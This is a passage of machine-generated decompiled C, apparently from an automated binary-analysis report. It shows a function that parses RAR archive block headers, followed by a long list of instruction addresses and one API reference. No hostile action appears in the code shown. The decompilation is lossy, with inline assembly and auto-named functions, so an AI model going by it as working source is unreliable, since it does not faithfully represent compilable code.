                                                                                                                                                  									_t76 = _t561 + 0x20; // 0x20
                                                                                                                                                  									E00408D7D( &_v56, _t76);
                                                                                                                                                  									_t78 = _t561 + 0x21; // 0x21
                                                                                                                                                  									E00408D7D( &_v56, _t78);
                                                                                                                                                  									_t80 = _t561 + 0x22; // 0x22
                                                                                                                                                  									_v12 = _t80;
                                                                                                                                                  									E00408D9F( &_v56, _t80);
                                                                                                                                                  									_t83 = _t561 + 0x24; // 0x24
                                                                                                                                                  									E00408DDE( &_v56, _t83);
                                                                                                                                                  									_t85 = _t561 + 0x28; // 0x28
                                                                                                                                                  									_t537 = _t85;
                                                                                                                                                  									__eflags =  *(_t561 + 8) & 0x00000100;
                                                                                                                                                  									if(( *(_t561 + 8) & 0x00000100) == 0) {
                                                                                                                                                  										_t475 = _v20;
                                                                                                                                                  										 *_t537 =  *_t537 & 0x00000000;
                                                                                                                                                  										_t94 = _t561 + 0x2c; // 0x2c
                                                                                                                                                  										_t335 = _t94;
                                                                                                                                                  										 *_t335 =  *_t335 & 0x00000000;
                                                                                                                                                  										__eflags =  *_t475 - 0xffffffff;
                                                                                                                                                  										_v16 = _t335;
                                                                                                                                                  										if( *_t475 == 0xffffffff) {
                                                                                                                                                  											_t526 = 0x7fffffff;
                                                                                                                                                  											 *_t475 = 0x7fffffff;
                                                                                                                                                  											 *_t335 = 0x7fffffff;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										E00408DDE( &_v56, _t537);
                                                                                                                                                  										_t90 = _t561 + 0x2c; // 0x2c
                                                                                                                                                  										_v16 = _t90;
                                                                                                                                                  										E00408DDE( &_v56, _t90);
                                                                                                                                                  									}
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xcd8)) = E00401030( *_t537, 0, 0, 1) +  *_v64;
                                                                                                                                                  									asm("adc edx, edi");
                                                                                                                                                  									 *(_t561 + 0xcdc) = _t526;
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xce0)) = E00401030( *_v16, 0, 0, 1) +  *_v20;
                                                                                                                                                  									_t342 =  *_v12 & 0x0000ffff;
                                                                                                                                                  									asm("adc edx, edi");
                                                                                                                                                  									_t539 = 0xfff;
                                                                                                                                                  									 *(_t561 + 0xce4) = _t526;
                                                                                                                                                  									__eflags = _t342 - 0xfff;
                                                                                                                                                  									if(_t342 < 0xfff) {
                                                                                                                                                  										_t539 = _t342 & 0x0000ffff;
                                                                                                                                                  									}
                                                                                                                                                  									E00408E23( &_v56,  &_v4224, _t539);
                                                                                                                                                  									_t107 = _t561 + 0x30; // 0x30
                                                                                                                                                  									 *((char*)(_t570 + _t539 - 0x107c)) = 0;
                                                                                                                                                  									_v16 = _t107;
                                                                                                                                                  									E0040DBC0(_t107,  &_v4224, 0x400);
                                                                                                                                                  									_t347 =  *((intOrPtr*)(_t561 + 4));
                                                                                                                                                  									__eflags = _t347 - 0x7a;
                                                                                                                                                  									if(_t347 != 0x7a) {
                                                                                                                                                  										__eflags = _t347 - 0x74;
                                                                                                                                                  										if(_t347 == 0x74) {
                                                                                                                                                  											__eflags =  *(_t561 + 8) & 0x00000200;
                                                                                                                                                  											if(( *(_t561 + 8) & 0x00000200) == 0) {
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  												 *((short*)(_t561 + 0x430)) = 0;
                                                                                                                                                  											} else {
                                                                                                                                                  												E00403097( &_v88);
                                                                                                                                                  												_t394 = E0040A35D( &_v88,  &_v4224);
                                                                                                                                                  												_t500 =  *_v12 & 0x0000ffff;
                                                                                                                                                  												_t132 = _t561 + 0x430; // 0x430
                                                                                                                                                  												_t549 = _t132;
                                                                                                                                                  												__eflags = _t394 - _t500;
                                                                                                                                                  												if(_t394 != _t500) {
                                                                                                                                                  													__eflags = _t500 - _t394 + 1;
                                                                                                                                                  													E004030A8( &_v88,  &_v4224, _t570 + _t394 + 1 - 0x107c, _t500 - _t394 + 1, _t549, 0x400);
                                                                                                                                                  												} else {
                                                                                                                                                  													E0040E2AF( &_v4224, _t549, 0x3ff);
                                                                                                                                                  													E0040E1E9(_t500, _t549, _v16, 0x3ff);
                                                                                                                                                  													CharToOemA(_v16, _v16);
                                                                                                                                                  												}
                                                                                                                                                  												__eflags =  *_t549;
                                                                                                                                                  												if( *_t549 == 0) {
                                                                                                                                                  													 *(_t561 + 8) =  *(_t561 + 8) & 0x0000fdff;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											E00401BFE(_t440);
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										_t552 = ( *(_t561 + 0xa) & 0x0000ffff) - ( *_v12 & 0x0000ffff) - 0x20;
                                                                                                                                                  										__eflags =  *(_t561 + 8) & 0x00000400;
                                                                                                                                                  										if(( *(_t561 + 8) & 0x00000400) != 0) {
                                                                                                                                                  											_t552 = _t552 - 8;
                                                                                                                                                  											__eflags = _t552;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _t552;
                                                                                                                                                  										if(_t552 > 0) {
                                                                                                                                                  											_t117 = _t561 + 0xc30; // 0xc30
                                                                                                                                                  											E004016C4(_t117, _t552);
                                                                                                                                                  											E00408E23( &_v56,  *((intOrPtr*)(_t561 + 0xc30)), _t552);
                                                                                                                                                  											_t409 = E0040A4C2(_v16, 0x4122dc);
                                                                                                                                                  											__eflags = _t409;
                                                                                                                                                  											if(_t409 == 0) {
                                                                                                                                                  												 *((intOrPtr*)(_t440 + 0x4640)) = (((( *( *((intOrPtr*)(_t561 + 0xc30)) + 0xb) & 0x000000ff) << 8) + ( *( *((intOrPtr*)(_t561 + 0xc30)) + 0xa) & 0x000000ff) << 8) + ( *(_t410 + 9) & 0x000000ff) << 8) + ( *(_t410 + 8) & 0x000000ff);
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(_t561 + 8) & 0x00000400;
                                                                                                                                                  									if(( *(_t561 + 8) & 0x00000400) != 0) {
                                                                                                                                                  										_t147 = _t561 + 0xc3c; // 0xc3c
                                                                                                                                                  										E00408E23( &_v56, _t147, 8);
                                                                                                                                                  									}
                                                                                                                                                  									_t150 = _t561 + 0xc44; // 0xc44
                                                                                                                                                  									E0040DFCD(_t150,  *_v60);
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xc68)) = 0;
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xc8c)) = 0;
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xcb0)) = 0;
                                                                                                                                                  									__eflags =  *(_t561 + 8) & 0x00001000;
                                                                                                                                                  									if(( *(_t561 + 8) & 0x00001000) == 0) {
                                                                                                                                                  										L70:
                                                                                                                                                  										 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) +  *((intOrPtr*)(_t561 + 0xcd8));
                                                                                                                                                  										asm("adc [ebx+0x6d84], eax");
                                                                                                                                                  										_v68 =  *(_t561 + 8) >> 0x00000003 & 0x00000001;
                                                                                                                                                  										_t358 =  !(E00408E5B( &_v56, _v68));
                                                                                                                                                  										 *(_t440 + 0x6d9a) = _t358;
                                                                                                                                                  										__eflags =  *_t561 - _t358;
                                                                                                                                                  										if( *_t561 != _t358) {
                                                                                                                                                  											_t359 = _v24;
                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t359 + 4)) - 0x7a;
                                                                                                                                                  											if( *((intOrPtr*)(_t359 + 4)) == 0x7a) {
                                                                                                                                                  												E0040A5BB(_v16, "- ???");
                                                                                                                                                  											}
                                                                                                                                                  											 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                  											E0040321D(0x414c7c, 1);
                                                                                                                                                  											_t361 = E0040DC38(_v16);
                                                                                                                                                  											E0040B282(_t440 + 0x17, E004098D0(0x68), _t361);
                                                                                                                                                  											_t571 = _t571 + 0xc;
                                                                                                                                                  										}
                                                                                                                                                  										goto L76;
                                                                                                                                                  									} else {
                                                                                                                                                  										E00408D9F( &_v56,  &_v64);
                                                                                                                                                  										_v84 = _t440 + 0x52ec;
                                                                                                                                                  										_v80 = _t440 + 0x5310;
                                                                                                                                                  										_v76 = _t440 + 0x5334;
                                                                                                                                                  										_v72 = _t440 + 0x5358;
                                                                                                                                                  										_v20 = 0;
                                                                                                                                                  										_v12 = 0xc;
                                                                                                                                                  										do {
                                                                                                                                                  											_t541 =  *(_t570 + _v20 * 4 - 0x50);
                                                                                                                                                  											_t374 = (_v64 & 0x0000ffff) >> _v12;
                                                                                                                                                  											_v68 = _t374;
                                                                                                                                                  											__eflags = _t374 & 0x00000008;
                                                                                                                                                  											if((_t374 & 0x00000008) == 0) {
                                                                                                                                                  												goto L69;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = _v20;
                                                                                                                                                  											if(_v20 != 0) {
                                                                                                                                                  												E00408DDE( &_v56,  &_v60);
                                                                                                                                                  												E0040DFCD(_t541, _v60);
                                                                                                                                                  											}
                                                                                                                                                  											_t488 = 9;
                                                                                                                                                  											_t375 = memcpy( &_v128,  *(_t570 + _v20 * 4 - 0x50), _t488 << 2);
                                                                                                                                                  											_t574 = _t571 + 0xc;
                                                                                                                                                  											__eflags = _t375 & 0x00000004;
                                                                                                                                                  											if((_t375 & 0x00000004) != 0) {
                                                                                                                                                  												_t191 =  &_v108;
                                                                                                                                                  												 *_t191 = _v108 + 1;
                                                                                                                                                  												__eflags =  *_t191;
                                                                                                                                                  											}
                                                                                                                                                  											_v104 = _v104 & 0x00000000;
                                                                                                                                                  											_t563 = 3;
                                                                                                                                                  											_t376 = _t375 & _t563;
                                                                                                                                                  											__eflags = _t376;
                                                                                                                                                  											if(_t376 <= 0) {
                                                                                                                                                  												L68:
                                                                                                                                                  												_t490 = 9;
                                                                                                                                                  												memcpy( *(_t570 + _v20 * 4 - 0x50),  &_v128, _t490 << 2);
                                                                                                                                                  												_t571 = _t574 + 0xc;
                                                                                                                                                  												_t561 = _v24;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t566 = _t563 - _t376 << 3;
                                                                                                                                                  												__eflags = _t566;
                                                                                                                                                  												_t548 = _t376;
                                                                                                                                                  												do {
                                                                                                                                                  													E00408D7D( &_v56,  &_v25);
                                                                                                                                                  													_t382 = (_v25 & 0x000000ff) << _t566;
                                                                                                                                                  													_t566 = _t566 + 8;
                                                                                                                                                  													_v104 = _v104 | _t382;
                                                                                                                                                  													_t548 = _t548 - 1;
                                                                                                                                                  													__eflags = _t548;
                                                                                                                                                  												} while (_t548 != 0);
                                                                                                                                                  												goto L68;
                                                                                                                                                  											}
                                                                                                                                                  											L69:
                                                                                                                                                  											_v20 = _v20 + 1;
                                                                                                                                                  											_v12 = _v12 - 4;
                                                                                                                                                  											__eflags = _v12 - 0xfffffffc;
                                                                                                                                                  										} while (_v12 > 0xfffffffc);
                                                                                                                                                  										goto L70;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								_t514 = _t465 - 6;
                                                                                                                                                  								__eflags = _t514;
                                                                                                                                                  								if(_t514 == 0) {
                                                                                                                                                  									goto L33;
                                                                                                                                                  								} else {
                                                                                                                                                  									__eflags = _t514 == 1;
                                                                                                                                                  									if(_t514 == 1) {
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										_t568 = _t440 + 0x5398;
                                                                                                                                                  										__eflags =  *_t568 & 0x00000002;
                                                                                                                                                  										if(( *_t568 & 0x00000002) != 0) {
                                                                                                                                                  											E00408DDE( &_v56, _t440 + 0x539c);
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *_t568 & 0x00000008;
                                                                                                                                                  										if(( *_t568 & 0x00000008) != 0) {
                                                                                                                                                  											E00408D9F( &_v56, _t440 + 0x53a0);
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										__eflags =  *_t533 & 0x00008000;
                                                                                                                                                  										if(( *_t533 & 0x00008000) != 0) {
                                                                                                                                                  											E00408DDE( &_v56,  &_v12);
                                                                                                                                                  											 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) + _v12;
                                                                                                                                                  											asm("adc dword [ebx+0x6d84], 0x0");
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L76;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *_t533 & 0x00000002;
                                                                                                                                                  							if(( *_t533 & 0x00000002) != 0) {
                                                                                                                                                  								goto L19;
                                                                                                                                                  							}
                                                                                                                                                  							goto L22;
                                                                                                                                                  						}
                                                                                                                                                  						L19:
                                                                                                                                                  						_push(6);
                                                                                                                                                  						goto L23;
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040B282(_t440 + 0x17, E004098D0(0x68), "???");
                                                                                                                                                  						 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                  						E0040321D(0x414c7c, 3);
                                                                                                                                                  						goto L6;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t526 =  *(__ecx + 0x6d7c);
                                                                                                                                                  				_t429 =  *((intOrPtr*)(__ecx + 0x6d94)) + 0x14;
                                                                                                                                                  				asm("adc ecx, ecx");
                                                                                                                                                  				_t578 = _t526;
                                                                                                                                                  				if(_t578 < 0 || _t578 <= 0 &&  *((intOrPtr*)(__ecx + 0x6d78)) < _t429) {
                                                                                                                                                  					goto L10;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t554 = _t440 + 0xe60;
                                                                                                                                                  					_v5 = 1;
                                                                                                                                                  					if(E00405651(_t440, _t526, _t440 + 0xe60, 8) == 8) {
                                                                                                                                                  						_t432 =  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418;
                                                                                                                                                  						__eflags =  *_t432;
                                                                                                                                                  						if( *_t432 == 0) {
                                                                                                                                                  							_t432 = E00402C52(2, _t440 + 0x17, _t432, 0x80);
                                                                                                                                                  							__eflags = _t432;
                                                                                                                                                  							if(_t432 == 0) {
                                                                                                                                                  								E00404EF5(_t440);
                                                                                                                                                  								_t432 = L004033FF(0x414c7c, _t570, 0xff);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *((char*)(_t440 + 0x46a0)) - 0x24;
                                                                                                                                                  						_t569 = _t440 + 0xc20;
                                                                                                                                                  						asm("sbb al, al");
                                                                                                                                                  						__eflags =  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418;
                                                                                                                                                  						E00402D79(_t569, _t526,  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418, _t554, 0, 0, _t432 + 0x00000001 & 0x000000ff);
                                                                                                                                                  						_v32 = _t569;
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					goto L5;
                                                                                                                                                  				}
                                                                                                                                                  			}





















































































                                                                                                                                                  0x00401ca1
                                                                                                                                                  0x00401ca9
                                                                                                                                                  0x00401cb1
                                                                                                                                                  0x00401cb3
                                                                                                                                                  0x00401cbc
                                                                                                                                                  0x00401cc2
                                                                                                                                                  0x00401cc8
                                                                                                                                                  0x00401cd4
                                                                                                                                                  0x00401d2e
                                                                                                                                                  0x00401d2e
                                                                                                                                                  0x00401d9f
                                                                                                                                                  0x00401da4
                                                                                                                                                  0x00401da9
                                                                                                                                                  0x00401dad
                                                                                                                                                  0x00401d12
                                                                                                                                                  0x00401d14
                                                                                                                                                  0x00401d19
                                                                                                                                                  0x00401d19
                                                                                                                                                  0x00401d1d
                                                                                                                                                  0x00401d1d
                                                                                                                                                  0x00401d22
                                                                                                                                                  0x00401d22
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d27
                                                                                                                                                  0x00401dbd
                                                                                                                                                  0x00401dc9
                                                                                                                                                  0x00401dd2
                                                                                                                                                  0x00401ddc
                                                                                                                                                  0x00401de2
                                                                                                                                                  0x00401de7
                                                                                                                                                  0x00401df1
                                                                                                                                                  0x00401df6
                                                                                                                                                  0x00401df9
                                                                                                                                                  0x00401dfd
                                                                                                                                                  0x00401e30
                                                                                                                                                  0x00401e36
                                                                                                                                                  0x00401e39
                                                                                                                                                  0x00401e3f
                                                                                                                                                  0x00401e42
                                                                                                                                                  0x00401e49
                                                                                                                                                  0x00401e4c
                                                                                                                                                  0x00401e4c
                                                                                                                                                  0x00401e4f
                                                                                                                                                  0x00401e50
                                                                                                                                                  0x00401e53
                                                                                                                                                  0x00401e5b
                                                                                                                                                  0x00401e62
                                                                                                                                                  0x00401e68
                                                                                                                                                  0x00401e6e
                                                                                                                                                  0x00401e76
                                                                                                                                                  0x00401e76
                                                                                                                                                  0x00401e79
                                                                                                                                                  0x00401e7f
                                                                                                                                                  0x00402369
                                                                                                                                                  0x0040236a
                                                                                                                                                  0x00402375
                                                                                                                                                  0x00402376
                                                                                                                                                  0x00402385
                                                                                                                                                  0x0040238f
                                                                                                                                                  0x00402396
                                                                                                                                                  0x004023a2
                                                                                                                                                  0x004023a2
                                                                                                                                                  0x004023a7
                                                                                                                                                  0x004023ad
                                                                                                                                                  0x004023b2
                                                                                                                                                  0x004023b6
                                                                                                                                                  0x004023bc
                                                                                                                                                  0x004023be
                                                                                                                                                  0x004023c5
                                                                                                                                                  0x004023cb
                                                                                                                                                  0x0040247d
                                                                                                                                                  0x00402483
                                                                                                                                                  0x00402489
                                                                                                                                                  0x004024b6
                                                                                                                                                  0x004024b6
                                                                                                                                                  0x004024b9
                                                                                                                                                  0x004024bc
                                                                                                                                                  0x004024c1
                                                                                                                                                  0x004024c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004024c6
                                                                                                                                                  0x0040248b
                                                                                                                                                  0x0040249b
                                                                                                                                                  0x004024ac
                                                                                                                                                  0x00402462
                                                                                                                                                  0x00402469
                                                                                                                                                  0x00402470
                                                                                                                                                  0x00402475
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402475
                                                                                                                                                  0x00402493
                                                                                                                                                  0x00402499
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402499
                                                                                                                                                  0x004023d7
                                                                                                                                                  0x004023da
                                                                                                                                                  0x004023e0
                                                                                                                                                  0x004023e6
                                                                                                                                                  0x004023ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004023f3
                                                                                                                                                  0x004023f6
                                                                                                                                                  0x00402446
                                                                                                                                                  0x00402453
                                                                                                                                                  0x0040245d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040245d
                                                                                                                                                  0x004023f8
                                                                                                                                                  0x004023ff
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402405
                                                                                                                                                  0x0040240c
                                                                                                                                                  0x00402411
                                                                                                                                                  0x00402414
                                                                                                                                                  0x00402415
                                                                                                                                                  0x00402415
                                                                                                                                                  0x00402417
                                                                                                                                                  0x00402419
                                                                                                                                                  0x0040241a
                                                                                                                                                  0x0040241d
                                                                                                                                                  0x00402422
                                                                                                                                                  0x00402426
                                                                                                                                                  0x00402428
                                                                                                                                                  0x0040242d
                                                                                                                                                  0x0040242f
                                                                                                                                                  0x00402431
                                                                                                                                                  0x00402431
                                                                                                                                                  0x00402435
                                                                                                                                                  0x00402435
                                                                                                                                                  0x00402435
                                                                                                                                                  0x0040243b
                                                                                                                                                  0x00402440
                                                                                                                                                  0x00402444
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402444
                                                                                                                                                  0x00401e85
                                                                                                                                                  0x00401e85
                                                                                                                                                  0x00401e86
                                                                                                                                                  0x00401f05
                                                                                                                                                  0x00401f05
                                                                                                                                                  0x00401f08
                                                                                                                                                  0x00401f0e
                                                                                                                                                  0x00401f10
                                                                                                                                                  0x00401f10
                                                                                                                                                  0x00401f1e
                                                                                                                                                  0x00401f1f
                                                                                                                                                  0x00401f20
                                                                                                                                                  0x00401f2a
                                                                                                                                                  0x00401f2b
                                                                                                                                                  0x00401f2e
                                                                                                                                                  0x00401f33
                                                                                                                                                  0x00401f36
                                                                                                                                                  0x00401f3d
                                                                                                                                                  0x00401f40
                                                                                                                                                  0x00401f45
                                                                                                                                                  0x00401f4c
                                                                                                                                                  0x00401f51
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f5d
                                                                                                                                                  0x00401f64
                                                                                                                                                  0x00401f67
                                                                                                                                                  0x00401f6c
                                                                                                                                                  0x00401f73
                                                                                                                                                  0x00401f78
                                                                                                                                                  0x00401f7f
                                                                                                                                                  0x00401f84
                                                                                                                                                  0x00401f8b
                                                                                                                                                  0x00401f8e
                                                                                                                                                  0x00401f93
                                                                                                                                                  0x00401f9a
                                                                                                                                                  0x00401fa4
                                                                                                                                                  0x00401fa4
                                                                                                                                                  0x00401fa7
                                                                                                                                                  0x00401fab
                                                                                                                                                  0x00401fc7
                                                                                                                                                  0x00401fca
                                                                                                                                                  0x00401fcd
                                                                                                                                                  0x00401fcd
                                                                                                                                                  0x00401fd0
                                                                                                                                                  0x00401fd3
                                                                                                                                                  0x00401fd6
                                                                                                                                                  0x00401fd9
                                                                                                                                                  0x00401fdb
                                                                                                                                                  0x00401fe0
                                                                                                                                                  0x00401fe2
                                                                                                                                                  0x00401fe2
                                                                                                                                                  0x00401fad
                                                                                                                                                  0x00401fb1
                                                                                                                                                  0x00401fb6
                                                                                                                                                  0x00401fbd
                                                                                                                                                  0x00401fc0
                                                                                                                                                  0x00401fc0
                                                                                                                                                  0x00401ffd
                                                                                                                                                  0x00402009
                                                                                                                                                  0x0040200b
                                                                                                                                                  0x0040201d
                                                                                                                                                  0x00402026
                                                                                                                                                  0x00402029
                                                                                                                                                  0x0040202b
                                                                                                                                                  0x00402032
                                                                                                                                                  0x00402038
                                                                                                                                                  0x0040203b
                                                                                                                                                  0x0040203d
                                                                                                                                                  0x0040203d
                                                                                                                                                  0x0040204b
                                                                                                                                                  0x0040205b
                                                                                                                                                  0x00402060
                                                                                                                                                  0x00402068
                                                                                                                                                  0x0040206b
                                                                                                                                                  0x00402070
                                                                                                                                                  0x00402073
                                                                                                                                                  0x00402076
                                                                                                                                                  0x00402103
                                                                                                                                                  0x00402106
                                                                                                                                                  0x00402111
                                                                                                                                                  0x00402115
                                                                                                                                                  0x0040219e
                                                                                                                                                  0x004021a0
                                                                                                                                                  0x0040211b
                                                                                                                                                  0x0040211e
                                                                                                                                                  0x0040212a
                                                                                                                                                  0x00402132
                                                                                                                                                  0x00402135
                                                                                                                                                  0x00402135
                                                                                                                                                  0x0040213b
                                                                                                                                                  0x0040213d
                                                                                                                                                  0x00402172
                                                                                                                                                  0x00402188
                                                                                                                                                  0x0040213f
                                                                                                                                                  0x0040214c
                                                                                                                                                  0x0040215a
                                                                                                                                                  0x00402165
                                                                                                                                                  0x00402165
                                                                                                                                                  0x0040218d
                                                                                                                                                  0x00402191
                                                                                                                                                  0x00402198
                                                                                                                                                  0x00402198
                                                                                                                                                  0x00402191
                                                                                                                                                  0x004021a9
                                                                                                                                                  0x004021a9
                                                                                                                                                  0x0040207c
                                                                                                                                                  0x0040208d
                                                                                                                                                  0x00402090
                                                                                                                                                  0x00402094
                                                                                                                                                  0x00402096
                                                                                                                                                  0x00402096
                                                                                                                                                  0x00402096
                                                                                                                                                  0x00402099
                                                                                                                                                  0x0040209b
                                                                                                                                                  0x004020a1
                                                                                                                                                  0x004020a8
                                                                                                                                                  0x004020b7
                                                                                                                                                  0x004020c4
                                                                                                                                                  0x004020c9
                                                                                                                                                  0x004020cb
                                                                                                                                                  0x004020f8
                                                                                                                                                  0x004020f8
                                                                                                                                                  0x004020cb
                                                                                                                                                  0x0040209b
                                                                                                                                                  0x004021b3
                                                                                                                                                  0x004021b7
                                                                                                                                                  0x004021bb
                                                                                                                                                  0x004021c5
                                                                                                                                                  0x004021c5
                                                                                                                                                  0x004021cf
                                                                                                                                                  0x004021d5
                                                                                                                                                  0x004021e1
                                                                                                                                                  0x004021e7
                                                                                                                                                  0x004021ed
                                                                                                                                                  0x004021f3
                                                                                                                                                  0x004021f7
                                                                                                                                                  0x004022d5
                                                                                                                                                  0x004022db
                                                                                                                                                  0x004022ea
                                                                                                                                                  0x004022f8
                                                                                                                                                  0x00402303
                                                                                                                                                  0x00402305
                                                                                                                                                  0x0040230c
                                                                                                                                                  0x0040230f
                                                                                                                                                  0x00402315
                                                                                                                                                  0x00402318
                                                                                                                                                  0x0040231c
                                                                                                                                                  0x00402326
                                                                                                                                                  0x00402326
                                                                                                                                                  0x00402332
                                                                                                                                                  0x00402339
                                                                                                                                                  0x00402341
                                                                                                                                                  0x00402353
                                                                                                                                                  0x00402358
                                                                                                                                                  0x00402358
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004021fd
                                                                                                                                                  0x00402204
                                                                                                                                                  0x0040220f
                                                                                                                                                  0x00402218
                                                                                                                                                  0x00402221
                                                                                                                                                  0x0040222a
                                                                                                                                                  0x0040222d
                                                                                                                                                  0x00402230
                                                                                                                                                  0x00402237
                                                                                                                                                  0x0040223a
                                                                                                                                                  0x00402245
                                                                                                                                                  0x00402247
                                                                                                                                                  0x0040224a
                                                                                                                                                  0x0040224c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040224e
                                                                                                                                                  0x00402252
                                                                                                                                                  0x0040225b
                                                                                                                                                  0x00402265
                                                                                                                                                  0x0040226a
                                                                                                                                                  0x00402276
                                                                                                                                                  0x0040227a
                                                                                                                                                  0x0040227a
                                                                                                                                                  0x0040227c
                                                                                                                                                  0x0040227e
                                                                                                                                                  0x00402280
                                                                                                                                                  0x00402280
                                                                                                                                                  0x00402280
                                                                                                                                                  0x00402280
                                                                                                                                                  0x00402283
                                                                                                                                                  0x00402289
                                                                                                                                                  0x0040228a
                                                                                                                                                  0x0040228a
                                                                                                                                                  0x0040228c
                                                                                                                                                  0x004022b2
                                                                                                                                                  0x004022bb
                                                                                                                                                  0x004022bf
                                                                                                                                                  0x004022bf
                                                                                                                                                  0x004022c1
                                                                                                                                                  0x0040228e
                                                                                                                                                  0x00402290
                                                                                                                                                  0x00402290
                                                                                                                                                  0x00402293
                                                                                                                                                  0x00402295
                                                                                                                                                  0x0040229c
                                                                                                                                                  0x004022a7
                                                                                                                                                  0x004022a9
                                                                                                                                                  0x004022ac
                                                                                                                                                  0x004022af
                                                                                                                                                  0x004022af
                                                                                                                                                  0x004022af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402295
                                                                                                                                                  0x004022c4
                                                                                                                                                  0x004022c4
                                                                                                                                                  0x004022c7
                                                                                                                                                  0x004022cb
                                                                                                                                                  0x004022cb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402237
                                                                                                                                                  0x004021f7
                                                                                                                                                  0x00401e88
                                                                                                                                                  0x00401e88
                                                                                                                                                  0x00401e8b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401e8d
                                                                                                                                                  0x00401e8d
                                                                                                                                                  0x00401e8e
                                                                                                                                                  0x00401ecb
                                                                                                                                                  0x00401ecc
                                                                                                                                                  0x00401ecd
                                                                                                                                                  0x00401ece
                                                                                                                                                  0x00401ed4
                                                                                                                                                  0x00401ed7
                                                                                                                                                  0x00401ee3
                                                                                                                                                  0x00401ee3
                                                                                                                                                  0x00401ee8
                                                                                                                                                  0x00401eeb
                                                                                                                                                  0x00401efb
                                                                                                                                                  0x00401efb
                                                                                                                                                  0x00401e90
                                                                                                                                                  0x00401e95
                                                                                                                                                  0x00401e98
                                                                                                                                                  0x00401ea5
                                                                                                                                                  0x00401ead
                                                                                                                                                  0x00401eb3
                                                                                                                                                  0x00401eb3
                                                                                                                                                  0x00401e98
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401e8e
                                                                                                                                                  0x00401e8b
                                                                                                                                                  0x00401e44
                                                                                                                                                  0x00401e47
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401e47
                                                                                                                                                  0x00401e3b
                                                                                                                                                  0x00401e3b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401dff
                                                                                                                                                  0x00401e10
                                                                                                                                                  0x00401e1f
                                                                                                                                                  0x00401e26
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401e26
                                                                                                                                                  0x00401dfd
                                                                                                                                                  0x00401cdc
                                                                                                                                                  0x00401ce4
                                                                                                                                                  0x00401ce7
                                                                                                                                                  0x00401ce9
                                                                                                                                                  0x00401ceb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401cf9
                                                                                                                                                  0x00401cfb
                                                                                                                                                  0x00401d04
                                                                                                                                                  0x00401d10
                                                                                                                                                  0x00401d3a
                                                                                                                                                  0x00401d3f
                                                                                                                                                  0x00401d42
                                                                                                                                                  0x00401d50
                                                                                                                                                  0x00401d55
                                                                                                                                                  0x00401d57
                                                                                                                                                  0x00401d5b
                                                                                                                                                  0x00401d6a
                                                                                                                                                  0x00401d6a
                                                                                                                                                  0x00401d57
                                                                                                                                                  0x00401d6f
                                                                                                                                                  0x00401d76
                                                                                                                                                  0x00401d7c
                                                                                                                                                  0x00401d8f
                                                                                                                                                  0x00401d97
                                                                                                                                                  0x00401d9c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d9c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d10

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00404FA3: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7D3,?,?,00405524,?,?), ref: 00404FBA
